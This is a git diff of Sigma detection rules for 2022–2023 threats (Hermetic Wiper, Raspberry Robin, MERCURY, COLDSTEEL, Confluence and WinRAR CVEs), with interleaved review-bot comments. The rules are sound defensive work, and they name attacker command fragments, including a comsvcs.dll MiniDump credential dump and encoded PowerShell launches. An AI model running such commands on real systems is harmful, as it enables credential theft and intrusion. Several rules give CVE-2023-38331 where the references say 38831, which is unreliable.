@@ -1,8 +1,7 @@ title: Hermetic Wiper TG Process Patterns id: 2f974656-6d83-4059-bbdf-68ac5403422f status: test -description: Detects process execution patterns found in intrusions related to the - Hermetic Wiper malware attacks against Ukraine in February 2022 +description: Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022 references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia author: Florian Roth (Nextron Systems) @@ -24,13 +23,13 @@ detection: selection1: Image|endswith: \policydefinitions\postgresql.exe selection2: - - CommandLine|contains: - - CSIDL_SYSTEM_DRIVE\temp\sys.tmp - - ' 1> \\\\127.0.0.1\ADMIN$\__16' - - CommandLine|contains|all: - - 'powershell -c ' - - '\comsvcs.dll MiniDump ' - - \winupd.log full + - CommandLine|contains: + - CSIDL_SYSTEM_DRIVE\temp\sys.tmp + - ' 1> \\\\127.0.0.1\ADMIN$\__16' + - CommandLine|contains|all: + - 'powershell -c ' + - '\comsvcs.dll MiniDump ' + - \winupd.log full condition: process_creation and (1 of selection*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml b/sigma/sysmon/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml index 7b4a1ed94..034dc4905 100644 --- a/sigma/sysmon/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml +++ b/sigma/sysmon/emerging-threats/2022/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_single_dot_ending_file.yml 
@@ -1,8 +1,7 @@ title: Potential Raspberry Robin Dot Ending File id: a35c97c8-d9c4-4c89-a3e7-533dc0bcb73a status: test -description: Detects commandline containing reference to files ending with a "." This - scheme has been seen used by raspberry-robin +description: Detects commandline containing reference to files ending with a "." This scheme has been seen used by raspberry-robin author: Nasreddine Bencherchali (Nextron Systems) references: - https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ @@ -20,7 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|re: \\[a-zA-Z0-9]{1,32}\.[a-zA-Z0-9]{1,6}\.[ "']{1} + # Example 1: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-3f-raspberryrobin-runonce.png + # Example 2: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-5f-odbcconf.png + # Example 3: https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/10/fig-6f-fauppod-command-line.png + CommandLine|re: \\[a-zA-Z0-9]{1,32}\.[a-zA-Z0-9]{1,6}\.[ "']{1} # cannot match on end-of-line because of FPs with bind DNS notation condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml b/sigma/sysmon/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml index ad512a482..cd3896fe3 100644 --- a/sigma/sysmon/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml +++ b/sigma/sysmon/emerging-threats/2022/TA/ACTINIUM/proc_creation_win_apt_actinium_persistence.yml 
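Review bot: The `{1}` quantifier at the end of the new regex line is redundant (`[ "']{1}` is identical to `[ "']`), and the trailing inline comment makes the line very long; moving the end-of-line caveat above the expression next to the three example links keeps the pattern readable: `CommandLine|re: \\[a-zA-Z0-9]{1,32}\.[a-zA-Z0-9]{1,6}\.[ "']`. The caveat itself is valuable and should stay, since it records why the pattern requires a delimiter after the dot instead of anchoring to end of string.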
@@ -1,8 +1,7 @@ title: Potential ACTINIUM Persistence Activity id: e1118a8f-82f5-44b3-bb6b-8a284e5df602 status: test -description: Detects specific process parameters as used by ACTINIUM scheduled task - persistence creation. +description: Detects specific process parameters as used by ACTINIUM scheduled task persistence creation. references: - https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations author: Andreas Hunkeler (@Karneades) @@ -22,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - schtasks - create - wscript diff --git a/sigma/sysmon/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml b/sigma/sysmon/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml index 32466e0a6..72ad1d92d 100644 --- a/sigma/sysmon/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml +++ b/sigma/sysmon/emerging-threats/2022/TA/MERCURY/proc_creation_win_apt_mercury.yml @@ -21,9 +21,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_base: - CommandLine|contains|all: + CommandLine|contains|all: - -exec bypass -w 1 -enc - - UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA + - UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA # Start-Job -ScriptBlock condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml index 09b93a75e..d3cbd0c02 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml 
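Review bot: The comment `# Start-Job -ScriptBlock` added to the base64 line in the MERCURY hunk explains only the first two words; the value is the UTF-16LE base64 encoding of `Start-Job -ScriptBlock {(saps ("p`, so it is an exact indicator for that specific script prefix rather than a generic match on `Start-Job`. Documenting the full decoded text lets maintainers verify the value without re-decoding it: `# UTF-16LE base64 of: Start-Job -ScriptBlock {(saps ("p`.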
+++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-22518/proc_creation_win_exploit_cve_2023_22518_confluence_tomcat_child_proc.yml @@ -1,14 +1,11 @@ title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) id: 1ddaa9a4-eb0b-4398-a9fe-7b018f9e23db related: - - id: f8987c03-4290-4c96-870f-55e75ee377f4 - type: similar + - id: f8987c03-4290-4c96-870f-55e75ee377f4 + type: similar status: experimental -description: 'Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center - / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. - create admin accounts and execute arbitrary commands. - - ' +description: | + Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. references: - https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html - https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment @@ -37,12 +34,13 @@ detection: - \tomcat10.exe ParentCommandLine|contains: confluence selection_child: - - Image|endswith: - - \cmd.exe - - \powershell.exe - - OriginalFileName: - - Cmd.Exe - - PowerShell.EXE + # Note: Only children associated with known campaigns + - Image|endswith: + - \cmd.exe + - \powershell.exe + - OriginalFileName: + - Cmd.Exe + - PowerShell.EXE condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml index 88bbfa8ba..f3b873eda 100644 
--- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-23397/registry_set_exploit_cve_2023_23397_outlook_reminder_trigger.yml @@ -1,10 +1,7 @@ title: Outlook Task/Note Reminder Received id: fc06e655-d98c-412f-ac76-05c2698b1cb2 status: experimental -description: Detects changes to the registry values related to outlook that indicates - that a reminder was triggered for a Note or Task item. This could be a sign of - exploitation of CVE-2023-23397. Further investigation is required to determine - the success of an exploitation. +description: Detects changes to the registry values related to outlook that indicates that a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine the success of an exploitation. references: - https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-27363/file_event_win_cve_2023_27363_foxit_rce.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-27363/file_event_win_cve_2023_27363_foxit_rce.yml index c1fba0f53..be0f6c49e 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-27363/file_event_win_cve_2023_27363_foxit_rce.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-27363/file_event_win_cve_2023_27363_foxit_rce.yml 
@@ -1,8 +1,7 @@ title: Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader id: 9cae055f-e1d2-4f81-b8a5-1986a68cdd84 status: experimental -description: Detects suspicious ".hta" file creation in the startup folder by Foxit - Reader. This can be an indication of CVE-2023-27363 exploitation. +description: Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation. references: - https://github.com/j00sean/SecBugs/tree/ff72d553f75d93e1a0652830c0f74a71b3f19c46/CVEs/CVE-2023-27363 - https://www.zerodayinitiative.com/advisories/ZDI-23-491/ diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/file_event_win_exploit_cve_2023_34362_moveit_transfer.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/file_event_win_exploit_cve_2023_34362_moveit_transfer.yml index e44dd100e..35dcd6e4d 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/file_event_win_exploit_cve_2023_34362_moveit_transfer.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-34362-MOVEit-Transfer-Exploit/file_event_win_exploit_cve_2023_34362_moveit_transfer.yml @@ -47,6 +47,10 @@ detection: - \MOVEitTransfer\wwwroot\_human2.aspx - \MOVEitTransfer\wwwroot\human2.aspx.lnk - \MOVEitTransfer\wwwroot\human2.aspx + # Uncomment selection if you wanna threat hunt for additional artifacts + # selection_cmdline: + # TargetFilename|contains: ':\Windows\TEMP\' + # TargetFilename|endswith: '.cmdline' selection_compiled_asp: CreationUtcTime|startswith: - '2023-03- ' diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_report_creation.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_report_creation.yml index 5876767d4..e13c3439c 100644 
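Review bot: The commented-out `selection_cmdline` block in the MOVEit hunk is inert as written, and if a user uncomments it the rule's `condition` (outside this hunk) must also be extended or the new selection is silently ignored; the comment should say so. `wanna` is also out of register for a rule file. Suggest `# Optional hunting selection for compiler artifacts (.cmdline under ':\Windows\TEMP\'); if enabled, add it to the condition as well`.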
--- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_report_creation.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_report_creation.yml @@ -1,8 +1,7 @@ title: Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location id: 92389a99-5215-43b0-a09f-e334453b2ed3 status: experimental -description: Detects the creation of a "Report.wer" file in an uncommon folder structure. - This could be a sign of potential exploitation of CVE-2023-36874. +description: Detects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874. references: - https://github.com/Wh04m1001/CVE-2023-36874 - https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/ @@ -25,6 +24,7 @@ detection: TargetFilename|endswith: \Report.wer filter_main_locations: TargetFilename|contains: + # Note: This list is non exhaustive. Use this as a start for hunting for suspicious folder report - \ReportArchive\AppCrash_ - \ReportArchive\AppHang_ - \ReportArchive\Critical_ diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_wermgr_creation.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_wermgr_creation.yml index f11130cdf..52ac70098 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_wermgr_creation.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/file_event_win_exploit_cve_2023_36874_wermgr_creation.yml 
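Review bot: The new comment inside `filter_main_locations` reads awkwardly (`hunting for suspicious folder report`) and should state what the list is — known-legitimate report folders that are excluded — so tuners understand that any unlisted location will alert. Suggest `# Note: This list is non exhaustive. Extend it with other legitimate report folders seen in your environment; unlisted locations will alert`.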
@@ -1,8 +1,7 @@ title: Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation id: ad0960eb-0015-4d16-be13-b3d9f18f1342 status: experimental -description: Detects the creation of a file named "wermgr.exe" being created in an - uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874. +description: Detects the creation of a file named "wermgr.exe" being created in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874. references: - https://github.com/Wh04m1001/CVE-2023-36874 - https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/ @@ -26,12 +25,12 @@ detection: filter_main_locations: TargetFilename|contains: - :\$WINDOWS.~BT\NewOS\ - - :\$WinREAgent\ + - :\$WinREAgent\ # From "wuauclt.exe" - :\Windows\servicing\LCU\ - :\Windows\System32\ - :\Windows\SysWOW64\ - :\Windows\WinSxS\ - - :\WUDownloadCache\ + - :\WUDownloadCache\ # Windows Update Download Cache condition: file_event and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/proc_creation_win_exploit_cve_2023_36874_fake_wermgr.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/proc_creation_win_exploit_cve_2023_36874_fake_wermgr.yml index 5ac79d83b..5cce5b95f 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/proc_creation_win_exploit_cve_2023_36874_fake_wermgr.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36874/proc_creation_win_exploit_cve_2023_36874_fake_wermgr.yml 
@@ -1,9 +1,7 @@ title: Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution id: 50dbc08b-60ce-40f1-a6b6-346497e34c88 status: experimental -description: Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" - binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" - in exploitation of CVE-2023-36874 +description: Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874 references: - https://github.com/Wh04m1001/CVE-2023-36874 - https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/ diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36884/file_event_win_exploit_cve_2023_36884_office_windows_html_rce_file_patterns.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36884/file_event_win_exploit_cve_2023_36884_office_windows_html_rce_file_patterns.yml index b5b79d647..bfe5c9192 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36884/file_event_win_exploit_cve_2023_36884_office_windows_html_rce_file_patterns.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-36884/file_event_win_exploit_cve_2023_36884_office_windows_html_rce_file_patterns.yml @@ -1,8 +1,7 @@ title: Potential CVE-2023-36884 Exploitation Dropped File id: 8023d3a2-dcdc-44da-8fa9-5c7906e55b38 status: experimental -description: Detects a specific file being created in the recent folder of Office. - These files have been seen being dropped during potential exploitations of CVE-2023-36884 +description: Detects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884 references: - https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit - https://twitter.com/wdormann/status/1679184475677130755 
diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/file_event_win_exploit_cve_2023_38331_winrar_susp_double_ext.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/file_event_win_exploit_cve_2023_38331_winrar_susp_double_ext.yml index 68eeb9f4e..3f670ea49 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/file_event_win_exploit_cve_2023_38331_winrar_susp_double_ext.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/file_event_win_exploit_cve_2023_38331_winrar_susp_double_ext.yml @@ -1,11 +1,10 @@ title: CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File id: e4556676-fc5c-4e95-8c39-5ef27791541f related: - - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343 - type: similar + - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343 + type: similar status: experimental -description: Detects the creation of a file with a double extension and a space by - WinRAR. This could be a sign of exploitation of CVE-2023-38331 +description: Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331 references: - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/ - https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml index 055196c91..82ee0697c 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml 
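Review bot: The title and the reflowed description both name `CVE-2023-38331`, while the references, the directory `CVE-2023-38831/` and the related rule's file name use `CVE-2023-38831`; this looks like a transposed digit inherited from the source rule rather than a second CVE. The same mismatch appears in the title and description of `proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml` in the next hunk. If 38831 is the intended identifier, the two lines would read `title: CVE-2023-38831 Exploitation Attempt - Suspicious Double Extension File` and `description: Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38831`; the file name `file_event_win_exploit_cve_2023_38331_winrar_susp_double_ext.yml` carries the same digits and would need the same correction.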
@@ -1,11 +1,10 @@ title: CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343 related: - - id: e4556676-fc5c-4e95-8c39-5ef27791541f - type: similar + - id: e4556676-fc5c-4e95-8c39-5ef27791541f + type: similar status: experimental -description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), - where an attacker can leverage WinRAR to execute arbitrary commands and binaries. +description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries. references: - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/ - https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md @@ -27,19 +26,20 @@ detection: selection_parent: ParentImage|endswith: \WinRAR.exe selection_folder: - CommandLine|contains: \AppData\Local\Temp\Rar$ + CommandLine|contains: \AppData\Local\Temp\Rar$ selection_double_ext: - CommandLine|re: \.[a-zA-Z0-9]{1,4} \. + CommandLine|re: \.[a-zA-Z0-9]{1,4} \. selection_binaries: - - Image|endswith: - - \cmd.exe - - \wscript.exe - - OriginalFileName: - - Cmd.Exe - - cscript.exe - - PowerShell.EXE - - pwsh.dll - - wscript.exe + # Note: add additional binaries that the attacker might use + - Image|endswith: + - \cmd.exe + - \wscript.exe + - OriginalFileName: + - Cmd.Exe + - cscript.exe + - PowerShell.EXE + - pwsh.dll + - wscript.exe condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-40477/file_event_win_exploit_cve_2023_40477_winrar_rev_file_abuse.yml b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-40477/file_event_win_exploit_cve_2023_40477_winrar_rev_file_abuse.yml index 9391ab643..f66c80f91 100644 
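Review bot: In `selection_binaries` the `Image|endswith` alternative lists only `\cmd.exe` and `\wscript.exe`, while the sibling `OriginalFileName` alternative also covers `cscript.exe`, `PowerShell.EXE` and `pwsh.dll`; the new `# Note: add additional binaries ...` comment invites additions but leaves this asymmetry, so detection of those three hosts depends entirely on `OriginalFileName` being populated. Adding `- \cscript.exe`, `- \powershell.exe` and `- \pwsh.exe` to the `Image|endswith` list makes both alternatives cover the same set. The comment could also say that the two list entries are alternatives (either one matches), since `selection_binaries` is a list of maps.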
--- a/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-40477/file_event_win_exploit_cve_2023_40477_winrar_rev_file_abuse.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/CVE-2023-40477/file_event_win_exploit_cve_2023_40477_winrar_rev_file_abuse.yml @@ -1,9 +1,7 @@ title: CVE-2023-40477 Potential Exploitation - .REV File Creation id: c3bd6c55-d495-4c34-918e-e03e8828c074 status: experimental -description: Detects the creation of ".rev" files by WinRAR. Could be indicative of - potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly - after creation or a WinRAR application crash. +description: Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash. references: - https://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/ - https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC @@ -24,7 +22,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: - - \explorer.exe + - \explorer.exe # When extracted via context menu - \WinRAR.exe TargetFilename|endswith: .rev condition: file_event and selection diff --git a/sigma/sysmon/emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/proc_creation_win_exploit_other_win_server_undocumented_rce.yml b/sigma/sysmon/emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/proc_creation_win_exploit_other_win_server_undocumented_rce.yml index 39e94ba38..af1139dbb 100644 --- a/sigma/sysmon/emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/proc_creation_win_exploit_other_win_server_undocumented_rce.yml +++ b/sigma/sysmon/emerging-threats/2023/Exploits/Windows-Server-Unknown-Exploit/proc_creation_win_exploit_other_win_server_undocumented_rce.yml 
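Review bot: The new comment `# When extracted via context menu` explains why `\explorer.exe` is listed, but combined with `TargetFilename|endswith: .rev` the selection fires on any `.rev` file Explorer writes (a copy or a saved download), not only a WinRAR extraction. That is worth stating either in the comment, e.g. `# When extracted via context menu; also matches .rev files copied or saved through Explorer`, or in the `falsepositives` section, which lies below this hunk.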
@@ -1,8 +1,7 @@ title: Potential Exploitation Attempt Of Undocumented WindowsServer RCE id: 6d5b8176-d87d-4402-8af4-53aee9db7b5d status: test -description: Detects potential exploitation attempt of undocumented Windows Server - Pre Auth Remote Code Execution (RCE) +description: Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE) references: - https://github.com/SigmaHQ/sigma/pull/3946 - https://twitter.com/hackerfantastic/status/1616455335203438592?s=20 @@ -24,8 +23,8 @@ detection: ParentImage|endswith: \svchost.exe Image|endswith: \svchost.exe ParentCommandLine|contains: -k DHCPServer - CommandLine|contains: -k DHCPServer - User|contains: + CommandLine|contains: -k DHCPServer + User|contains: # Covers many language settings for Network Service. Please expand. - NETWORK SERVICE - NETZWERKDIENST - SERVIZIO DI RETE diff --git a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_renamed_cmd.yml b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_renamed_cmd.yml index 2f76f0942..0cd713162 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_renamed_cmd.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_renamed_cmd.yml @@ -1,8 +1,7 @@ title: Potential COLDSTEEL RAT File Indicators id: c708a93f-46b4-4674-a5b8-54aa6219c5fa status: experimental -description: Detects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" - directory. Seen being used by the COLDSTEEL RAT in some of its variants. +description: Detects the creation of a file named "dllhost.exe" in the "C:\users\public\Documents\" directory. Seen being used by the COLDSTEEL RAT in some of its variants. references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf author: Nasreddine Bencherchali (Nextron Systems) 
diff --git a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_service_dll_creation.yml b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_service_dll_creation.yml index 738453768..f607c7d60 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_service_dll_creation.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/file_event_win_malware_coldsteel_service_dll_creation.yml @@ -1,8 +1,7 @@ title: Potential COLDSTEEL Persistence Service DLL Creation id: 1fea93a2-1524-4a3c-9828-3aa0c2414e27 status: experimental -description: Detects the creation of a file in a specific location and with a specific - name related to COLDSTEEL RAT +description: Detects the creation of a file in a specific location and with a specific name related to COLDSTEEL RAT references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf author: X__Junior (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/image_load_malware_coldsteel_persistence_service_dll.yml b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/image_load_malware_coldsteel_persistence_service_dll.yml index 443e11dbb..ffc04c7e8 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/image_load_malware_coldsteel_persistence_service_dll.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/image_load_malware_coldsteel_persistence_service_dll.yml 
@@ -1,11 +1,8 @@ title: Potential COLDSTEEL Persistence Service DLL Load id: 1d7a57da-02e0-4f7f-92b1-c7b486ccfed5 status: experimental -description: 'Detects a suspicious DLL load by an "svchost" process based on location - and name that might be related to ColdSteel RAT. This DLL location and name has - been seen used by ColdSteel as the service DLL for its persistence mechanism - - ' +description: | + Detects a suspicious DLL load by an "svchost" process based on location and name that might be related to ColdSteel RAT. This DLL location and name has been seen used by ColdSteel as the service DLL for its persistence mechanism references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml index dacfa3784..8cf1b7dc4 100644 --- a/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml +++ b/sigma/sysmon/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml @@ -1,8 +1,7 @@ title: COLDSTEEL RAT Anonymous User Process Execution id: e01b6eb5-1eb4-4465-a165-85d40d874add status: experimental -description: Detects the creation of a process executing as user called "ANONYMOUS" - seen used by the "MileStone2016" variant of COLDSTEEL +description: Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf author: Nasreddine Bencherchali (Nextron Systems) 
